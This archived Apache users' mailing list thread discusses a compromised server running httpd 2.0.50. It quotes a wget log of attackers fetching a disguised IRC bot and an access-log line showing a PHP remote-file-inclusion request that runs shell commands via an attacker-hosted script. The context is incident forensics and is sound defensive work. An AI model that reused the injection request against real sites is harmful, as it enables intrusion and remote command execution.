httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: [users@httpd] Security issue with 2.0.50
Date Sat, 04 Dec 2004 03:13:00 GMT
Hi

Glad we agree :P

Following the safe_mode = off issue. a friend of mine, is using some 
kind of "online shop service" (dont know which one), and whenever we try 
to put safe_mode=on the shop says that it cant access tmp dir (/tmp) to 
use sessions and other stuff.
I tried creating and configuring a user-local tmp dir, with no luck 
(obviously modifying the source code).
I think this is a coding problem, but he dont want to recode the system 
(tipycal user excuse "it worked before"). Any hints ?

Well, any pointers will be well received :)

Be Excellent to each others !!

Shannon Eric Peevey wrote:
> 
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%   
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%   
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%   
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%   
>>> 75.30 KB/s
>>>  200K ......                                                100%  
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------

>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>>> now everything's ok but if somebody can explain what was I 
>>> experienced I'd be gratefull. I read on some sites about a worm 
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
> 
> http://www.energymech.net/
> 
> It seems like IRC bots, bombs, etc., are about the most popular uses for 
> these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic 
> analysis, of course :) ).  I agree with Ivan on this, though it could 
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
> vulnerability:
> 
> http://securityfocus.net/bid/11190/info/
> 
> I would look through your apache logs for shell commands, such as wget, 
> ls, etc., and you might be able to trace the exact vulnerability that 
> these people used.  Here is an example from a machine that was exploited 
> with a safe_mode=off exploit:
> 
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a

> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1)" 1101/3049 (36%)
> 
> You'll notice the commands after 'cmd='.  (Exploiting a file in the 
> pollvote application).
> 
> Let me know what you find.  (Contact me offlist, if you would like some 
> help).
> 
> thanks,
> 

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message